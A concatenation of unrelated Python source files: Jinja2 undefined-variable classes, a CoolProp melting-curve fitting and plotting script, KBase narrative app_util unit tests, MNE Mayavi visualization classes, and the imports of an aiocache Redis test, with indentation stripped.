def _fail_with_undefined_error(self, *args, **kwargs):
try:
return base._fail_with_undefined_error(self, *args, **kwargs)
except self._undefined_exception as e:
logger.error('Template variable error: %s', str(e))
raise e
def __str__(self):
rv = base.__str__(self)
_log_message(self)
return rv
def __iter__(self):
rv = base.__iter__(self)
_log_message(self)
return rv
if PY2:
def __nonzero__(self):
rv = base.__nonzero__(self)
_log_message(self)
return rv
def __unicode__(self):
rv = base.__unicode__(self)
_log_message(self)
return rv
else:
def __bool__(self):
rv = base.__bool__(self)
_log_message(self)
return rv
return LoggingUndefined
@implements_to_string
class DebugUndefined(Undefined):
"""An undefined that returns the debug info when printed.
>>> foo = DebugUndefined(name='foo')
>>> str(foo)
'{{ foo }}'
>>> not foo
True
>>> foo + 42
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
"""
__slots__ = ()
def __str__(self):
if self._undefined_hint is None:
if self._undefined_obj is missing:
return u'{{ %s }}' % self._undefined_name
return '{{ no such element: %s[%r] }}' % (
object_type_repr(self._undefined_obj),
self._undefined_name
)
return u'{{ undefined value printed: %s }}' % self._undefined_hint
@implements_to_string
class StrictUndefined(Undefined):
"""An undefined that barks on print and iteration as well as boolean
tests and all kinds of comparisons. In other words: you can do nothing
with it except checking if it's defined using the `defined` test.
>>> foo = StrictUndefined(name='foo')
>>> str(foo)
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
>>> not foo
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
>>> foo + 42
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
"""
__slots__ = ()
__iter__ = __str__ = __len__ = __nonzero__ = __eq__ = \
__ne__ = __bool__ = __hash__ = \
Undefined._fail_with_undefined_error
# remove remaining slots attributes, after the metaclass did the magic they
# are unneeded and irritating as they contain wrong data for the subclasses.
del Undefined.__slots__, DebugUndefined.__slots__, StrictUndefined.__slots__
|
|
import os, json
Simon_curves = {
"n-Propane" : {
"BibTeX" : "Reeves-JCP-1964", "T_m": -187.75 + 273.15, "parts": [{"T_0" : 85.3, "a" : 7.180e8, "c" : 1.283, "p_0" : 0.0, "T_max" : 168.63}]
},
"n-Pentane" : {
"BibTeX" : "Reeves-JCP-1964", "T_m": -129.89 + 273.15, "parts": [{"T_0" : 143.5, "a" : 6.600e8, "c" : 1.649, "p_0" : 0.0, "T_max" : 156.2}]
},
"Isopentane" : {
"BibTeX" : "Reeves-JCP-1964", "T_m": -159.92 + 273.15, "parts": [{"T_0" : 112.5, "a" : 5.916e8, "c" : 1.563, "p_0" : 0, "T_max" : 212.16}]
},
"Propylene" : {
"BibTeX" : "Reeves-JCP-1964", "T_m": -185.09 + 273.15, "parts": [{"T_0" : 86.0, "a" : 3.196e8, "c" : 2.821, "p_0" : 0, "T_min": 86.0, "T_max" : 129},
{"T_0" : 109.6, "a" : 3.064e8, "c" : 3.871, "p_0" : 4.450e8, "T_min": 129, "T_max" : 145.3}]
},
"Cyclohexane" : {
"BibTeX" : "Penoncello-IJT-1995", "T_m": 6.81 + 273.15, "parts": [{"T_0" : 279.7, "a" : 383.4e6, "c" : 1.41, "p_0" : 0, "T_max" : 401.7}]
},
"Krypton" : {
"BibTeX" : "Michels-PHYSICA-1962", "T_m": 115.95, "parts": [{"T_0" : 1, "a" : 109479.2307, "c" : 1.6169841, "p_0" : -237497645.7, "T_max" : 168.7}]
},
"Xenon" : {
"BibTeX" : "Michels-PHYSICA-1962", "T_m": 165.02, "parts": [{"T_0" : 1, "a" : 80890.5544859, "c" : 1.5891650, "p_0" : -260932309.446, "T_max" : 366.4}]
},
"CarbonMonoxide" : {
"BibTeX" : "Barreiros-JCT-1982", "T_m": 68.3, "parts": [{"T_0" : 1, "a" : 19560.8, "c" : 2.10747, "p_0" : -142921439.2, "T_max" : 87.5}]
},
"Oxygen": {
"BibTeX" : "Younglove-NIST-1982", "T_m": 54.75, "parts": [{"T_0" : 1, "a" : 227606.348, "c" : 1.769, "p_0" : -266999247.652, "T_max" : 63.1}]
},
"ParaHydrogen": {
"BibTeX" : "Younglove-NIST-1982", "T_m": 18.9, "parts": [{"T_0" : 1, "a" : 125746.643, "c" : 1.955, "p_0" : -21155737.752, "T_min" : 13.8033, "T_max" : 22},
{"T_0" : 1, "a" : 248578.596, "c" : 1.764739, "p_0" : -26280332.904, "T_min" : 22, "T_max" : 164.5}]
},
"Methane": {
"BibTeX" : "Abramson-HPR-2011", "T_m": 90.7, "parts": [{"T_0" : 90.6941, "a" : 0.208e9, "c" : 1.698, "p_0" : 1.17e4, "T_max" : 600}]
},
"Helium": {
"BibTeX" : "Datchi-PRB-2000", "T_m": 1.15, "parts": [{"T_0" : 1, "a" : 1.6067e6, "c" : 1.565, "p_0" : -1.6067e6, "T_max" : 700}]
},
"Neon": {
"BibTeX" : "SantamariaPerez-PRB-2010", "T_m": -1, "parts": [{"T_0" : 24.4, "a" : 1.7e9, "c" : 1/0.77, "p_0" : 101325, "T_max" : 700}]
},
"Hydrogen": {
"BibTeX" : "Datchi-PRB-2000", "T_m": 14.009985, "parts": [{"T_0" : 1, "a" : 2.31e5, "c" : 1.7627, "p_0" : -0.0052e6-2.31e5, "T_max" : 700}]
}
}
polynomial_in_Tr = {
"Argon" : {
"BibTeX" : "Tegeler-JPCRD-1999", "T_m": 87.28, "parts": [{"T_0" : 83.8058, "a" : [-7476.2665, 9959.0613], "t" : [1.05,1.275], "p_0" : 68891, "T_max" : 254.0}]
},
"Fluorine" : {
"BibTeX" : "deReuck-BOOK-1990", "T_m": 53.15, "parts": [{"T_0" : 53.4811, "a" : [988043.478261], "t" : [2.1845], "p_0" : 252, "T_max" : 55.4}]
},
"Nitrogen" : {
"BibTeX" : "Span-JPCRD-2000", "T_m": 77.34, "parts": [{"T_0" : 63.151, "a" : [12798.61], "t" : [1.78963], "p_0" : 12523, "T_max" : 283.8}]
},
"Ethane" : {
"BibTeX" : "Buecker-JCRD-2006", "T_m": 90.4, "parts": [{"T_0" : 90.368, "a" : [2.23626315e8, 1.05262374e8], "t" : [1.0, 2.55], "p_0" : 1.14, "T_max" : 110.2}]
},
"Isobutane" : {
"BibTeX" : "Buecker-JPCRD-2006B", "T_m": 113.55, "parts": [{"T_0" : 113.73, "a" : [1.9536371309e9], "t" : [6.12], "p_0" : 0.0219, "T_max" : 124.9}]
},
"Ethylene" : {
"BibTeX" : "Smukala-JPCRD-2000", "T_m": 169, "parts": [{"T_0" : 103.989, "a" : [2947001.84], "t" : [2.045], "p_0" : 122.65, "T_min" : 103.989, "T_max" : 110.369},
{"T_0" : 110.369, "a" : [6.82693421], "t" : [1.089], "p_0" : 46.8e6, "T_min" : 110.369, "T_max" : 188}]
},
"n-Butane" : {
"BibTeX" : "Buecker-JPCRD-2006B", "T_m": -137.92 + 273.15, "parts": [{"T_0" : 134.895, "a" : [5.585582364e8], "t" : [2.206], "p_0" : 0.653, "T_max" : 163.9}]
},
"Water" : {
"BibTeX" : "IAPWS", "T_m": -1, "parts": [{"T_0" : 273.16, "a" : [-0.119539337e7,-0.808183159e5,-0.333826860e4], "t" : [0.3000000e1, 0.257500e2, 0.103750e3], "p_0" : 611.657, "T_min": 273.16, "T_max" : 251.165},
{"T_0" : 251.165, "a" : [0.299948], "t" : [60], "p_0" : 208.566e6, "T_min": 251.165, "T_max" : 256.164},
{"T_0" : 256.164, "a" : [1.18721], "t" : [8], "p_0" : 350.1e6, "T_min": 256.164, "T_max" : 273.31},
{"T_0" : 273.31, "a" : [1.07476], "t" : [4.6], "p_0" : 623.4e6, "T_min": 273.31, "T_max" : 355}
]
}
}
polynomial_in_theta = {
"Methanol" : {
"BibTeX" : "deReuck-BOOK-1993", "T_m": 337.8, "parts": [{"T_0" : 175.61, "a" : [5.330770e9, 4.524780e9, 3.888861e10], "t" : [1, 1.5, 4], "p_0" : 0.187, "T_max" : 245.9}]
},
"CarbonDioxide" : {
"BibTeX" : "Span-JPCRD-1996", "T_m": 216.58, "parts": [{"T_0" : 216.592, "a" : [1955.5390, 2055.4593], "t" : [1, 2], "p_0" : 517950, "T_max" : 327.6}]
}
}
import CoolProp
__ = 0
for fluid in CoolProp.__fluids__:
if fluid not in Simon_curves and fluid not in polynomial_in_Tr and fluid not in polynomial_in_theta:
print fluid
__ += 1
else:
print ' '*30, fluid
print __
import CoolProp.CoolProp as CP
import json, numpy as np, matplotlib.pyplot as plt, pandas
ip = 1
irho = 1
Nrow,Ncol = 5,5
figp = plt.figure(figsize = (20,20))
figrho = plt.figure(figsize = (20,20))
def plot_rho(T, rho, fit = False):
x, y = (T-T[0])/(T[len(T)-1]-T[0]), (rho-rho[0])/(rho[len(rho)-1]-rho[0])
c = np.polyfit(x, y, 3)
yfit = np.polyval(c, x)
err = yfit - y
rms = np.sqrt(np.mean(np.power(err,2)))
rhofit = yfit*(rho[len(rho)-1]-rho[0])+rho[0]
if fit:
return T, (rhofit/rho-1)*100
else:
return x, y
def simon():
global ip, irho
for fluid, values in Simon_curves.iteritems():
axp = figp.add_subplot(Nrow, Ncol, ip); ip += 1
axrho = figrho.add_subplot(Nrow, Ncol, irho); irho += 1
axp.set_xlabel('T [K]')
axp.set_ylabel('p [Pa]')
axrho.set_xlabel('T [K]')
axrho.set_ylabel('rho [mol/m$^3$]')
axp.set_title(fluid+' - '+str(round(CP.Props(fluid,"molemass"),2)))
axrho.set_title(fluid)
fname = os.path.join('fluids',fluid+'.json')
j = json.load(open(fname,'r'))
for part in values['parts']:
if 'T_min' not in part:
part['T_min'] = round(CP.Props(fluid,"Tmin"),4)
values['type'] = 'Simon'
j['ANCILLARIES']['melting_line'] = values
fp = open(fname,'w')
from package_json import json_options
fp.write(json.dumps(j,**json_options))
fp.close()
# if not isinstance(values, list):
# values = [values]
# df = pandas.read_csv('melting_curves/'+fluid+'.mlt',names=['T','p','rho'])
# axp.plot(df['T'], df['p'], 'o', mfc='none')
# x,y = plot_rho(df['T'],df['rho'],fit = True)
# axrho.plot(x,y, 'o', mfc='none')
# else:
# for i in ['I','II']:
# df = pandas.read_csv('melting_curves/'+fluid+'-'+i+'.mlt',names=['T','p','rho'])
# axp.plot(df['T'], df['p'], 'o', mfc='none')
# x,y = plot_rho(df['T'],df['rho'],fit = True)
# axrho.plot(x,y, 'o', mfc='none')
T_m = values['T_m']
for i, value in enumerate(values['parts']):
Tmin = value.get('T_min',CP.Props(fluid,"Tmin"))
Tmax = value['T_max']
T = np.linspace(Tmin, Tmax, 200)
T_0 = value['T_0']
p_0 = value['p_0']
a = value['a']
c = value['c']
p = p_0 + a*((T/T_0)**c - 1)
axp.plot(T, p)
cc = 1.75
aa = 3e8#(101325-p_0)/((T_m/T_0)**cc-1)
pt = CP.Props(fluid,'ptriple')
pp = pt + aa*((T/Tmin)**cc - 1)
axp.plot(T_m,101325,'*')
axp.plot(T,pp,'--')
print fluid, CP.Props(fluid,"molemass"), CP.Props(fluid, 'accentric'), pp[-1]/p[-1]-1
# if fluid == 'Helium':
# T = np.array([326.2,345.1,362.8,385.1,419.4,459,499,535.7,570,608])
# p = p_0 + a*((T/T_0)**c - 1)
# print p
def Tr():
global ip, irho
for fluid, values in polynomial_in_Tr.iteritems():
axp = figp.add_subplot(Nrow, Ncol, ip); ip += 1
axrho = figrho.add_subplot(Nrow, Ncol, irho); irho += 1
axp.set_xlabel('T [K]')
axp.set_ylabel('p [Pa]')
axrho.set_xlabel('T [K]')
axrho.set_ylabel('rho [mol/m$^3$]')
axp.set_title(fluid+' - '+str(round(CP.Props(fluid,"molemass"),2)))
axrho.set_title(fluid)
fname = os.path.join('fluids',fluid+'.json')
j = json.load(open(fname,'r'))
for part in values['parts']:
if 'T_min' not in part:
part['T_min'] = round(CP.Props(fluid,"Tmin"),4)
values['type'] = 'polynomial_in_Tr'
j['ANCILLARIES']['melting_line'] = values
fp = open(fname,'w')
from package_json import json_options
fp.write(json.dumps(j,**json_options))
fp.close()
if fluid == 'Ethylene':
T = [104.003, 104.059, 104.13, 104.2, 104.27, 104.41, 104.55, 104.69, 104.83, 104.969, 105.108, 105.386, 106.077, 106.764, 107.446, 111.384, 119.283, 127.136, 158.146, 188.621]
p = np.array([0.1, 0.5, 1, 1.5, 2, 3, 4, 5, 6, 7, 8, 10, 15, 20, 25, 50, 75, 100, 200, 300])*1e6
axp.plot(T,p,'*')
# if not isinstance(values, list):
# values = [values]
# df = pandas.read_csv('melting_curves/'+fluid+'.mlt',names=['T','p','rho'])
# axp.plot(df['T'], df['p'], 'o', mfc='none')
# x,y = plot_rho(df['T'],df['rho'],fit = True)
# axrho.plot(x,y, 'o', mfc='none')
#
# else:
# for i in ['I','II']:
# df = pandas.read_csv('melting_curves/'+fluid+'-'+i+'.mlt',names=['T','p','rho'])
# axp.plot(df['T'], df['p'], 'o', mfc='none')
# x,y = plot_rho(df['T'],df['rho'],fit = True)
# axrho.plot(x,y, 'o', mfc='none')
T_m = values['T_m']
for i,value in enumerate(values['parts']):
Tmin = value.get('T_min',CP.Props(fluid,"Tmin"))
Tmax = value['T_max']
T = np.linspace(Tmin, Tmax, 200)
a = value['a']
t = value['t']
T_t = value['T_0']
p_t = value['p_0']
RHS = 0
for i in range(len(a)):
RHS += a[i]*((T/T_t)**t[i] - 1)
p = p_t*(RHS + 1)
axp.plot(T, p)
cc = 1.75
aa = 3e8#(101325-p_0)/((T_m/T_0)**cc-1)
pt = CP.Props(fluid,'ptriple')
pp = pt + aa*((T/Tmin)**cc - 1)
axp.plot(T_m,101325,'*')
axp.plot(T,pp,'--')
print fluid, CP.Props(fluid,"molemass"), CP.Props(fluid, 'accentric'), pp[-1]/p[-1]-1
def theta():
global ip, irho
for fluid, values in polynomial_in_theta.iteritems():
axp = figp.add_subplot(Nrow, Ncol, ip); ip += 1
axrho = figrho.add_subplot(Nrow, Ncol, irho); irho += 1
axp.set_xlabel('T [K]')
axp.set_ylabel('p [Pa]')
axrho.set_xlabel('T [K]')
axrho.set_ylabel('rho [mol/m$^3$]')
axp.set_title(fluid+' - '+str(round(CP.Props(fluid,"molemass"),2)))
axrho.set_title(fluid)
fname = os.path.join('fluids',fluid+'.json')
j = json.load(open(fname,'r'))
for part in values['parts']:
if 'T_min' not in part:
part['T_min'] = round(CP.Props(fluid,"Tmin"),4)
values['type'] = 'polynomial_in_Theta'
j['ANCILLARIES']['melting_line'] = values
fp = open(fname,'w')
from package_json import json_options
fp.write(json.dumps(j,**json_options))
fp.close()
T_m = values['T_m']
for value in values['parts']:
a = value['a']
t = value['t']
T_t = value['T_0']
p_t = value['p_0']
Tmin = T_t
Tmax = value['T_max']
T = np.linspace(Tmin, Tmax, 200)
RHS = 0
for i in range(len(a)):
RHS += a[i]*(T/T_t - 1)**t[i]
p = p_t*(RHS + 1)
#df = pandas.read_csv('melting_curves/' + fluid + '.mlt', names=['T','p','rho'])
#axp.plot(df['T'], df['p'], 'o', mfc='none')
axp.plot(T, p)
#x,y = plot_rho(df['T'],df['rho'],fit = True)
#axrho.plot(x,y, 'o', mfc='none')
cc = 1.75
aa = 3e8#(101325-p_0)/((T_m/T_0)**cc-1)
pt = CP.Props(fluid,'ptriple')
pp = pt + aa*((T/Tmin)**cc - 1)
axp.plot(T_m,101325,'*')
axp.plot(T,pp,'--')
print fluid, CP.Props(fluid,"molemass"), CP.Props(fluid, 'accentric'), pp[-1]/p[-1]-1
if __name__=='__main__':
simon()
Tr()
theta()
figp.tight_layout()
figrho.tight_layout()
figp.savefig('p.pdf')
figrho.savefig('rho.pdf')
plt.close()
|
|
"""
Tests for the app_util module
"""
import unittest
import biokbase.auth
from biokbase.narrative.app_util import (
check_tag,
system_variable,
get_result_sub_path,
map_inputs_from_job,
map_outputs_from_state,
)
from .narrative_mock.mockclients import get_mock_client
import os
import mock
from . import util
import time
__author__ = "Bill Riehl <[email protected]>"
class DummyWorkspace:
def get_workspace_info(*args, **kwargs):
return [12345]
class AppUtilTestCase(unittest.TestCase):
@classmethod
def setUpClass(self):
config = util.TestConfig()
self.user_id = config.get("users", "test_user")
self.user_token = util.read_token_file(
config.get_path("token_files", "test_user", from_root=True)
)
self.good_tag = "release"
self.bad_tag = "notATag"
# inject phony variables into the environment
# self.user_id = "KBaseTest"
# self.good_fake_token = "A1B2C3D4E5F6G7H8I9J0K1L2M3N4O5P6"
self.bad_fake_token = "NotAGoodTokenLOL"
self.workspace = "valid_workspace"
def test_check_tag_good(self):
self.assertTrue(check_tag(self.good_tag))
def test_check_tag_bad(self):
self.assertFalse(check_tag(self.bad_tag))
def test_check_tag_bad_except(self):
with self.assertRaises(ValueError):
check_tag(self.bad_tag, raise_exception=True)
def test_sys_var_user(self):
if self.user_token:
biokbase.auth.set_environ_token(self.user_token)
self.assertEqual(system_variable("user_id"), self.user_id)
def test_sys_var_no_ws(self):
if "KB_WORKSPACE_ID" in os.environ:
del os.environ["KB_WORKSPACE_ID"]
self.assertIsNone(system_variable("workspace"))
def test_sys_var_workspace(self):
os.environ["KB_WORKSPACE_ID"] = self.workspace
self.assertEqual(system_variable("workspace"), self.workspace)
def test_sys_var_no_ws_id(self):
if "KB_WORKSPACE_ID" in os.environ:
del os.environ["KB_WORKSPACE_ID"]
self.assertIsNone(system_variable("workspace_id"))
@mock.patch("biokbase.narrative.app_util.clients.get", get_mock_client)
def test_sys_var_workspace_id(self):
os.environ["KB_WORKSPACE_ID"] = self.workspace
self.assertEqual(system_variable("workspace_id"), 12345)
@mock.patch("biokbase.narrative.app_util.clients.get", get_mock_client)
def test_sys_var_workspace_id_except(self):
os.environ["KB_WORKSPACE_ID"] = "invalid_workspace"
self.assertIsNone(system_variable("workspace_id"))
def test_sys_var_user_bad(self):
biokbase.auth.set_environ_token(self.bad_fake_token)
self.assertIsNone(system_variable("user_id"))
def test_sys_var_user_none(self):
if "KB_AUTH_TOKEN" in os.environ:
del os.environ["KB_AUTH_TOKEN"]
self.assertIsNone(system_variable("user_id"))
def test_sys_var_time_ms(self):
cur_t = int(time.time() * 1000)
ts = system_variable("timestamp_epoch_ms")
self.assertTrue(cur_t <= ts)
self.assertTrue(ts - cur_t < 1000)
def test_sys_var_time_sec(self):
cur_t = int(time.time())
ts = system_variable("timestamp_epoch_sec")
self.assertTrue(cur_t <= ts)
self.assertTrue(ts - cur_t < 1)
def test_sys_var_bad(self):
self.assertIsNone(system_variable(self.bad_tag))
def test_get_result_sub_path(self):
result = [{"report": "this_is_a_report", "report_ref": "123/456/7"}]
path = [0, "report_ref"]
self.assertEqual(get_result_sub_path(result, path), "123/456/7")
def test_get_result_sub_path_deep_list(self):
result = ["foo", "bar", "baz"]
path = [2]
self.assertEqual(get_result_sub_path(result, path), "baz")
def test_get_result_sub_path_deep_obj(self):
result = ["foo", {"bar": "baz"}, "foobar"]
path = [1, "bar"]
self.assertEqual(get_result_sub_path(result, path), "baz")
def test_get_result_obj_path(self):
result = ["foo", 0, {"bar": {"baz": [10, 11, 12, 13]}}]
path = [2, "bar", "baz", 3]
self.assertEqual(get_result_sub_path(result, path), 13)
def test_get_result_sub_path_list_fail(self):
result = ["foo"]
path = [2]
self.assertIsNone(get_result_sub_path(result, path))
def test_get_result_sub_path_key_fail(self):
result = {"foo": "bar"}
path = ["baz"]
self.assertIsNone(get_result_sub_path(result, path))
def test_map_inputs_from_job(self):
inputs = [
"input1",
{"ws": "my_workspace", "foo": "bar"},
"some_ref/obj_id",
["ref/num_1", "ref/num_2", "num_3"],
123,
]
app_spec = {
"behavior": {
"kb_service_input_mapping": [
{"target_position": 0, "input_parameter": "an_input"},
{
"target_position": 1,
"target_property": "ws",
"input_parameter": "workspace",
},
{
"target_position": 1,
"target_property": "foo",
"input_parameter": "baz",
},
{
"target_position": 2,
"input_parameter": "ref_input",
"target_type_transform": "ref",
},
{
"target_position": 3,
"input_parameter": "a_list",
"target_type_transform": "list<ref>",
},
{
"target_position": 4,
"input_parameter": "a_num",
"target_type_transform": "int",
},
],
}
}
expected = {
"an_input": "input1",
"workspace": "my_workspace",
"baz": "bar",
"ref_input": "obj_id",
"a_list": ["num_1", "num_2", "num_3"],
"a_num": 123,
}
self.assertDictEqual(map_inputs_from_job(inputs, app_spec), expected)
def test_map_outputs_from_state_simple(self):
os.environ["KB_WORKSPACE_ID"] = self.workspace
app_spec = {
"parameters": [],
"behavior": {
"output_mapping": [{"narrative_system_variable": "workspace"}]
},
}
self.assertTupleEqual(
map_outputs_from_state(None, None, app_spec),
("kbaseDefaultNarrativeOutput", self.workspace),
)
def test_map_outputs_from_state(self):
os.environ["KB_WORKSPACE_ID"] = self.workspace
app_spec = {
"widgets": {"input": None, "output": "testOutputWidget"},
"parameters": [],
"behavior": {
"kb_service_output_mapping": [
{"narrative_system_variable": "workspace", "target_property": "ws"},
{"constant_value": 5, "target_property": "a_constant"},
{
"service_method_output_path": [1],
"target_property": "a_path_ref",
},
{"input_parameter": "an_input", "target_property": "an_input"},
]
},
}
params = {"an_input": "input_val"}
state = {"job_output": {"result": ["foo", "bar"]}}
expected = (
"testOutputWidget",
{
"ws": self.workspace,
"a_constant": 5,
"a_path_ref": "bar",
"an_input": "input_val",
},
)
self.assertTupleEqual(map_outputs_from_state(state, params, app_spec), expected)
def test_map_outputs_from_state_bad_spec(self):
os.environ["KB_WORKSPACE_ID"] = self.workspace
app_spec = {"not": "really"}
params = {"an_input": "input_val"}
state = {}
with self.assertRaises(ValueError):
map_outputs_from_state(state, params, app_spec)
if __name__ == "__main__":
unittest.main()
|
|
"""Mayavi/traits GUI visualization elements"""
# Authors: Christian Brodbeck <[email protected]>
#
# License: BSD (3-clause)
import os
import numpy as np
# allow import without traits
try:
from mayavi.mlab import pipeline, text3d
from mayavi.modules.glyph import Glyph
from mayavi.modules.surface import Surface
from mayavi.sources.vtk_data_source import VTKDataSource
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import error
from traits.api import (HasTraits, HasPrivateTraits, on_trait_change,
cached_property, Instance, Property, Array, Bool,
Button, Color, Enum, Float, Int, List, Range, Str)
from traitsui.api import View, Item, Group, HGroup, VGrid, VGroup
except:
from ..utils import trait_wraith
HasTraits = HasPrivateTraits = object
cached_property = on_trait_change = MlabSceneModel = Array = Bool = \
Button = Color = Enum = Float = Instance = Int = List = Property = \
Range = Str = View = Item = Group = HGroup = VGrid = VGroup = \
Glyph = Surface = VTKDataSource = trait_wraith
from ..transforms import apply_trans
headview_item = Item('headview', style='custom', show_label=False)
headview_borders = VGroup(Item('headview', style='custom', show_label=False),
show_border=True, label='View')
defaults = {'mri_fid_scale': 1e-2, 'hsp_fid_scale': 3e-2,
'hsp_fid_opacity': 0.3, 'hsp_points_scale': 4e-3,
'mri_color': (252, 227, 191), 'hsp_point_color': (255, 255, 255),
'lpa_color': (255, 0, 0), 'nasion_color': (0, 255, 0),
'rpa_color': (0, 0, 255)}
def _testing_mode():
"""Helper to determine if we're running tests"""
return (os.getenv('_MNE_GUI_TESTING_MODE', '') == 'true')
class HeadViewController(HasTraits):
"""
Set head views for Anterior-Left-Superior coordinate system
Parameters
----------
system : 'RAS' | 'ALS' | 'ARI'
Coordinate system described as initials for directions associated with
the x, y, and z axes. Relevant terms are: Anterior, Right, Left,
Superior, Inferior.
"""
system = Enum("RAS", "ALS", "ARI", desc="Coordinate system: directions of "
"the x, y, and z axis.")
right = Button()
front = Button()
left = Button()
top = Button()
scale = Float(0.16)
scene = Instance(MlabSceneModel)
view = View(VGrid('0', 'top', '0', Item('scale', label='Scale',
show_label=True),
'right', 'front', 'left', show_labels=False, columns=4))
@on_trait_change('scene.activated')
def _init_view(self):
self.scene.parallel_projection = True
# apparently scene,activated happens several times
if self.scene.renderer:
self.sync_trait('scale', self.scene.camera, 'parallel_scale')
# and apparently this does not happen by default:
self.on_trait_change(self.scene.render, 'scale')
@on_trait_change('top,left,right,front')
def on_set_view(self, view, _):
if self.scene is None:
return
system = self.system
kwargs = None
if system == 'ALS':
if view == 'front':
kwargs = dict(azimuth=0, elevation=90, roll=-90)
elif view == 'left':
kwargs = dict(azimuth=90, elevation=90, roll=180)
elif view == 'right':
kwargs = dict(azimuth=-90, elevation=90, roll=0)
elif view == 'top':
kwargs = dict(azimuth=0, elevation=0, roll=-90)
elif system == 'RAS':
if view == 'front':
kwargs = dict(azimuth=90, elevation=90, roll=180)
elif view == 'left':
kwargs = dict(azimuth=180, elevation=90, roll=90)
elif view == 'right':
kwargs = dict(azimuth=0, elevation=90, roll=270)
elif view == 'top':
kwargs = dict(azimuth=90, elevation=0, roll=180)
elif system == 'ARI':
if view == 'front':
kwargs = dict(azimuth=0, elevation=90, roll=90)
elif view == 'left':
kwargs = dict(azimuth=-90, elevation=90, roll=180)
elif view == 'right':
kwargs = dict(azimuth=90, elevation=90, roll=0)
elif view == 'top':
kwargs = dict(azimuth=0, elevation=180, roll=90)
else:
raise ValueError("Invalid system: %r" % system)
if kwargs is None:
raise ValueError("Invalid view: %r" % view)
if not _testing_mode():
self.scene.mlab.view(distance=None, reset_roll=True,
figure=self.scene.mayavi_scene, **kwargs)
class Object(HasPrivateTraits):
"""Represents a 3d object in a mayavi scene"""
points = Array(float, shape=(None, 3))
trans = Array()
name = Str
scene = Instance(MlabSceneModel, ())
src = Instance(VTKDataSource)
color = Color()
rgbcolor = Property(depends_on='color')
point_scale = Float(10, label='Point Scale')
opacity = Range(low=0., high=1., value=1.)
visible = Bool(True)
@cached_property
def _get_rgbcolor(self):
if hasattr(self.color, 'Get'): # wx
color = tuple(v / 255. for v in self.color.Get())
else:
color = self.color.getRgbF()[:3]
return color
@on_trait_change('trans,points')
def _update_points(self):
"""Update the location of the plotted points"""
if not hasattr(self.src, 'data'):
return
trans = self.trans
if np.any(trans):
if trans.ndim == 0 or trans.shape == (3,) or trans.shape == (1, 3):
pts = self.points * trans
elif trans.shape == (3, 3):
pts = np.dot(self.points, trans.T)
elif trans.shape == (4, 4):
pts = apply_trans(trans, self.points)
else:
err = ("trans must be a scalar, a length 3 sequence, or an "
"array of shape (1,3), (3, 3) or (4, 4). "
"Got %s" % str(trans))
error(None, err, "Display Error")
raise ValueError(err)
else:
pts = self.points
self.src.data.points = pts
class PointObject(Object):
"""Represents a group of individual points in a mayavi scene"""
label = Bool(False, enabled_when='visible')
text3d = List
glyph = Instance(Glyph)
resolution = Int(8)
def __init__(self, view='points', *args, **kwargs):
"""
Parameters
----------
view : 'points' | 'cloud'
Whether the view options should be tailored to individual points
or a point cloud.
"""
self._view = view
super(PointObject, self).__init__(*args, **kwargs)
def default_traits_view(self):
color = Item('color', show_label=False)
scale = Item('point_scale', label='Size')
if self._view == 'points':
visible = Item('visible', label='Show', show_label=True)
view = View(HGroup(visible, color, scale, 'label'))
elif self._view == 'cloud':
visible = Item('visible', show_label=False)
view = View(HGroup(visible, color, scale))
else:
raise ValueError("PointObject(view = %r)" % self._view)
return view
@on_trait_change('label')
def _show_labels(self, show):
self.scene.disable_render = True
while self.text3d:
text = self.text3d.pop()
text.remove()
if show:
fig = self.scene.mayavi_scene
for i, pt in enumerate(np.array(self.src.data.points)):
x, y, z = pt
t = text3d(x, y, z, ' %i' % i, scale=.01, color=self.rgbcolor,
figure=fig)
self.text3d.append(t)
self.scene.disable_render = False
@on_trait_change('visible')
def _on_hide(self):
if not self.visible:
self.label = False
@on_trait_change('scene.activated')
def _plot_points(self):
"""Add the points to the mayavi pipeline"""
# _scale = self.scene.camera.parallel_scale
if hasattr(self.glyph, 'remove'):
self.glyph.remove()
if hasattr(self.src, 'remove'):
self.src.remove()
if not _testing_mode():
fig = self.scene.mayavi_scene
else:
fig = None
x, y, z = self.points.T
scatter = pipeline.scalar_scatter(x, y, z)
glyph = pipeline.glyph(scatter, color=self.rgbcolor, figure=fig,
scale_factor=self.point_scale, opacity=1.,
resolution=self.resolution)
self.src = scatter
self.glyph = glyph
self.sync_trait('point_scale', self.glyph.glyph.glyph, 'scale_factor')
self.sync_trait('rgbcolor', self.glyph.actor.property, 'color',
mutual=False)
self.sync_trait('visible', self.glyph)
self.sync_trait('opacity', self.glyph.actor.property)
self.on_trait_change(self._update_points, 'points')
# self.scene.camera.parallel_scale = _scale
def _resolution_changed(self, new):
if not self.glyph:
return
self.glyph.glyph.glyph_source.glyph_source.phi_resolution = new
self.glyph.glyph.glyph_source.glyph_source.theta_resolution = new
class SurfaceObject(Object):
"""Represents a solid object in a mayavi scene
Notes
-----
Doesn't automatically update plot because update requires both
:attr:`points` and :attr:`tri`. Call :meth:`plot` after updateing both
attributes.
"""
rep = Enum("Surface", "Wireframe")
tri = Array(int, shape=(None, 3))
surf = Instance(Surface)
view = View(HGroup(Item('visible', show_label=False),
Item('color', show_label=False), Item('opacity')))
def clear(self):
if hasattr(self.src, 'remove'):
self.src.remove()
if hasattr(self.surf, 'remove'):
self.surf.remove()
self.reset_traits(['src', 'surf'])
@on_trait_change('scene.activated')
def plot(self):
"""Add the points to the mayavi pipeline"""
_scale = self.scene.camera.parallel_scale if not _testing_mode() else 1
self.clear()
if not np.any(self.tri):
return
fig = self.scene.mayavi_scene
x, y, z = self.points.T
if self.rep == 'Wireframe':
rep = 'wireframe'
else:
rep = 'surface'
src = pipeline.triangular_mesh_source(x, y, z, self.tri, figure=fig)
surf = pipeline.surface(src, figure=fig, color=self.rgbcolor,
opacity=self.opacity,
representation=rep, line_width=1)
self.src = src
self.surf = surf
self.sync_trait('visible', self.surf, 'visible')
self.sync_trait('rgbcolor', self.surf.actor.property, 'color',
mutual=False)
self.sync_trait('opacity', self.surf.actor.property, 'opacity')
if not _testing_mode():
self.scene.camera.parallel_scale = _scale
|
|
import pytest
import aioredis
from asynctest import CoroutineMock, MagicMock, patch, ANY
from aiocache import RedisCache
from aiocache.base import BaseCache
from aiocache.serializers import JsonSerializer
